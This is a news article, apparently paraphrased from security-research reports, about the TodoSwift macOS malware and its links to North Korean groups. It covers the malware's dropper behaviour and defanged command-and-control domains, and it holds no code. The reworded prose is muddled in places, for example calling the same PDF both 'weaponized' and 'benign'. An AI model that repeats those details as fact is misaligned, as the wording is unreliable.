New macOS Malicious Software TodoSwift Linked to North Korean Cyber Attacker Groups
Cybersecurity experts have detected a fresh macOS malicious program dubbed TodoSwift that shares resemblances with known harmful software linked to North Korean digital attacker groups.
“Several characteristics of this software align with malware previously identified to have origins in North Korea (DPRK) — specifically the cybercriminal group identified as BlueNoroff — such as KANDYKORN and RustBucket,” analyzed Kandji cybersecurity researcher Christopher Lopez in a statement.
RustBucket, publicly acknowledged in July 2023, indicates an AppleScript-based backdoor capable of retrieving subsequent payloads from a command-and-control (C2) server.
Elastic Security Labs previously discovered another macOS malware identified as KANDYKORN last year, which was used in association with a cyber incursion aimed at blockchain technicians of an undisclosed digital currency exchange platform.
Employing a sophisticated multi-stage infiltration mechanism, KANDYKORN possesses the capability to access and transmit data from a victim’s system. It’s also programmed to halt random processes and execute commands on the target device.
A shared characteristic observed within the two malware lineages is the utilization of linkpc[.]net domains for C2 functionalities. Both RustBucket and KANDYKORN are attributed to the efforts of a hacking faction known as the Lazarus Group (including its sub-division, BlueNoroff).
“The DPRK, operating through units like the Lazarus Group, persistently targets cryptocurrency industry entities with the aim of appropriating digital currency to evade international restrictions that impede their economic and aspirational advancement,” Elastic mentioned during that time.
“In this instance, they focused on blockchain experts active on a communal chat server with a pretext catered to their competencies and interests, offering financial benefits underneath.”
Recent observations from the Apple device administration and security system reveal that TodoSwift is disseminated in the guise of a TodoTasks, comprising a deployer segment.
This module is a Graphical User Interface (GUI) application scripted in SwiftUI engineered to showcase a weaponized PDF file to the victim, and concurrently downloading and executing a secondary-stage code, a tactic also utilized in RustBucket.
The benign PDF document serves as a Bitcoin-related material stored on Google Drive, whereas the malicious code is fetched from a website controlled by threat actors (“buy2x[.]com”). Ongoing investigation is ongoing concerning the exact details of the binary.
“The adoption of a Google Drive link and passing the C2 URL as a command-line argument to the phase 2 binary is in accordance with earlier DPRK malware targeting macOS systems,” Lopez remarked.
About Author
